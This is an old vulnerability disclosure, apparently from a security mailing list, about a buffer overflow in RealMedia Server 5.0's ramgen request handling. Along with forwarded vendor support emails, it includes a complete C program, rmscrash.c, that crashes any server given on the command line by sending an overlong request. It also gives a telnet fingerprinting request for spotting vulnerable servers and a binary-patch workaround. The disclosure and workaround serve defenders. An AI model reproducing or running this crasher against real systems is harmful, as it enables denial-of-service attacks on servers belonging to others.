RealMedia Server 5.0 Crasher (rmscrash.c)

[bow () BOW NET (bow)]

RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing
the buffer which stores the ramgen requests.

I emailed RealNetworks about it and they finally got back to me a month and
a half later. Their response was that it's a known issue with 5.0 and the
only way to fix it is to upgrade to 6.0.. Of course upgrading means paying
more money.

I really wish all companies would fully back their COMMERCIAL software and
make patches for previous releases. Oh well.

The exploit is included below. It's been tested on FreeBSD and RealMedia
server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the
person who crashed it in the pnserver error log. It looks like this:

  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
  ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
  ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
  ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
  ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report

An easy way to tell if a server is running 5.0 is to telnet to the realmedia port,
usually 7070, and typing:

  GET /SmpDsBhgRl <enter><enter>

> From what i've seen, RealMedia 5.0 servers always returns "Server: RealServer 1.0 Beta" in the
headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".

A hacked up fix for the problem that I've used is to edit the pnserver binary and change the ramgen
string to something else. This, however, will break the ramgen functionality. (Which i dont use).
If you are going to rename the ramgen in the binary to something else, make sure it matches the string
length of 6.

-bow

-- START OF RMSCRASH.C --

/*
 *  rmscrash.c  - bow () bow net
 *
 *  Crash a RealMedia 5.0 server by sending a very long ramgen request.
 *
 *  Test on:
 *         $ pnserver -v
 *         Version:        5.0-rvserver-build-290
 *         Platform: FreeBSD-2.1.x
 *
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>

#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>

#define BUFLEN 4082

char    buf[BUFLEN+14];
int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

void main (int argc, char *argv[]) {
        int i, port;

        if (argc < 3) {
                printf("Usage: %s realserver port\n",argv[0]);
                exit(-1);
        }

        port = atoi(argv[2]);

        memset(buf,0x41,BUFLEN);
        memcpy(buf,"GET /ramgen/",12);
        memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);

        if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }

        if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(port);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }

        printf("Connected to %s. Sending data\n",argv[1]);
        write(sock,buf,strlen(buf));
        printf("Done.\n");

        close(sock);
        exit(0);
}

--- END OF RMSCRASH.C ---

----- Forwarded message from tsserver () support real com -----

From: tsserver () support real com
Date: Wed, 22 Dec 1999 10:14:57  -0800
Subject: Re: max the ramgen buffer [#7570768]
To: bow () bow net
X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016

Hello Bow,

No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0.

Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer
------- Original Message --------
> From:           bow () bow net
> To:             tsserver () support real com
> Subject:        Re: max the ramgen buffer [#7570768]
> Date:           12/21/99 16:58:20
>
>
> Well is there a fix for this in the 5.0 server??
>
> -bow
>
> On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserver () support real com wrote:
> > Hello Bow,
> >
> > First of all, I apolgize for the delay in responding. Thank you so much for your patience.
> >
> > This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.
> >
> > Best wishes,
> > Kim
> > ~~~~~~~~~~~~~~~~~~~~
> > Kimberly Ayars
> > SDK Support Engineer
> > ------- Original Message --------
> > > From:                bow () bow net
> > > To:          tsserver () support real com
> > > Subject:     max the ramgen buffer
> > > Date:                11/06/99 04:10:46
> > >
> > >
> > > Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known 
> > > issue?
> > >
> > > ***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
> > > ***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report:
> > > 5.0-rvserver-build-290
> > > FreeBSD-2.1.x
> > >
> > >
> > > Do you guys have an updated Real5 server?
> > THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. 
> > REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND 
> > FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES 
> > WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN 
> > IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE 
> > EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT 
> > APPLY.
> >
> >
> > Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia 
> > and RealPlayer are trademarks of RealNetworks Inc.
> >
> >
> > ---------------------
> > Instructions to Reply
> > ---------------------
> >
> >
> > Your Incident ID number for this request is 7570768
> >
> > To reply to this message you may simply reply to this email.  (Please do not modify the subject line)
> >
> > To view all activity on this ticket go to the following URL.  You will also be able to reply from there.
> >
> >
> > http://customerrelations.real.com/scripts/rnforms/loginpage.asp
> >
> >
> > To verify your identity, you will be prompted for this Incident ID number and your email address.
THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. 
REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND 
FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER 
INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF 
REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE 
EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia 
and RealPlayer are trademarks of RealNetworks Inc.

---------------------
Instructions to Reply
---------------------

Your Incident ID number for this request is 7570768

To reply to this message you may simply reply to this email.  (Please do not modify the subject line)

To view all activity on this ticket go to the following URL.  You will also be able to reply from there.

http://customerrelations.real.com/scripts/rnforms/loginpage.asp

To verify your identity, you will be prompted for this Incident ID number and your email address.

----- End forwarded message -----